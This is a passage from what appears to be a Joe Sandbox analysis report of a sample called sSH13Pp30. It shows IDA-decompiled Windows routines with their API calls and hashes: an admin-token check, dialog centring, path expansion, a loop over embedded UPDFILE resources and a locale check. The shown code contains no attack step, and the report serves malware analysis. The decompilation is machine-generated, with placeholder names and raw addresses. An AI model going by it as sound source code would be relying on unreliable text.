                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                      							 *0xea288(0, _v24, _v28);
                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000E18DD), ref: 000E181A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 000E182C
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(000E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000E18DD), ref: 000E1855
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,000E18DD), ref: 000E1883
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,000E18DD), ref: 000E188A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                      • Opcode ID: 9e0c297ec7ecae1d0d3d82f3e45866ae154c06005dadb43dff76fd200a66cfa0
                                                                                                                                                                                                      • Instruction ID: 7d8ff830111d2e9da880fbbeb8cc3f9bbbce90f95a54fbc6c59c64c2795813ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e0c297ec7ecae1d0d3d82f3e45866ae154c06005dadb43dff76fd200a66cfa0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E119631F00249AFEB149FA5DC89ABEBBB8EF49710F500169FA05F6290DA359D00C791
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                      					_t24 = _a4;
                                                                                                                                                                                                      					E000E43D0(_t24, _t12);
                                                                                                                                                                                                      					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0xe9404);
                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe91dc = 1;
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 000E3490
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E349A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 000E34B2
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 000E34C4
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 000E34CB
                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 000E34D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 852535152-3940384054
                                                                                                                                                                                                      • Opcode ID: e7f3b39e2630cd8e0330d45507f646239618fcadc12e2b15959bbdd93875e215
                                                                                                                                                                                                      • Instruction ID: e81af439c21ae1da75db2cc475b02072884e40e31ace7104190c0938a78280a1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7f3b39e2630cd8e0330d45507f646239618fcadc12e2b15959bbdd93875e215
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE0192B13401D4AFE7265F66DC4C96D3E94EB4AB01F004014FA46BB5E0C634BF41C782
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E000E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                      					GetModuleFileNameA( *0xe9a3c,  &_v268, 0x104);
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E000E1680(_t65, E000E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E000E65E8( &_v268);
                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E000E1680(_t65, E000E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                      			}


                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 000E2AE6
                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 000E2AF2
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 000E2B12
                                                                                                                                                                                                      • CharUpperA.USER32 ref: 000E2B1E
                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 000E2B55
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 000E2BD4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                      • Opcode ID: c26f46c2bcc93c70b773b7db6f7091ea0d7e704aab74d169a31710e9371fa713
                                                                                                                                                                                                      • Instruction ID: 41305f58969cc939082b495021ba86a3f8fdd5e19ee48cd0b0b0ae0892c3f7c3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c26f46c2bcc93c70b773b7db6f7091ea0d7e704aab74d169a31710e9371fa713
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D4124342082C55EEB559F308C54AFE7BAD9F57700F0440DAE8C2B7202DB395E86CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E000E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				struct tagRECT _v24;
                                                                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                                                                      				struct HWND__* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				int _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				struct HWND__* _t63;
                                                                                                                                                                                                      				struct HWND__* _t67;
                                                                                                                                                                                                      				struct HWND__* _t68;
                                                                                                                                                                                                      				struct HDC__* _t69;
                                                                                                                                                                                                      				int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                                      				_v44 = __ecx;
                                                                                                                                                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                      				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                      				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                      				_t69 = GetDC(_v44);
                                                                                                                                                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                      				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                      				_t56 = _v48;
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                      				if(_t72 >= 0) {
                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000E43F1
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000E440B
                                                                                                                                                                                                      • GetDC.USER32(?), ref: 000E4423
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 000E442E
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 000E443A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 000E4447
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000E44A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
• Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                      • Opcode ID: 308d7a2c92e61fca079ae3450dfe4ce7ac375832eae95f95ba28db07e8dc28f6
                                                                                                                                                                                                      • Instruction ID: 572497729630e892d803005f208fbf5914440564a32183089d72ac4c6356137d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 308d7a2c92e61fca079ae3450dfe4ce7ac375832eae95f95ba28db07e8dc28f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3316C72F00159AFDB14CFB8DD889EEBBB5EB89310F154169F805F7280DA34AD058B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                      			E000E6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                      				E000E171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                                      						 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                      						 *0xea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                      							E000E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					return E000E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E171E: _vsnprintf.MSVCRT ref: 000E1750
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000E51CA,00000004,00000024,000E2F71,?,00000002,00000000), ref: 000E62CD
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000E51CA,00000004,00000024,000E2F71,?,00000002,00000000), ref: 000E62D4
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000E51CA,00000004,00000024,000E2F71,?,00000002,00000000), ref: 000E631B
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 000E6345
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000E51CA,00000004,00000024,000E2F71,?,00000002,00000000), ref: 000E6357
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                                                                                                      • Opcode ID: 7764ce2a3261d4b862c23b4e8d35cdb89e354a402e23045cd9d3c7ffdbcbc1a8
                                                                                                                                                                                                      • Instruction ID: b1deb31b2bd0f5e4e222ec4ad7a525398e7e2dbb86f89452bee415a8d231595e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7764ce2a3261d4b862c23b4e8d35cdb89e354a402e23045cd9d3c7ffdbcbc1a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7421F875B00259AFDB109F65EC859FE7B78EB49B50B100119FA02B7241DB3A9E018BE1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E681F(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                      				_t19 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                      				_t41 =  *0xe81d8; // 0x0
                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                      					 *0xe81d8 = 0;
                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      						_t41 =  *0xe81d8; // 0x0
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0xe1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                      								if(E000E66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                      										 *0xe81d8 = _t41;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
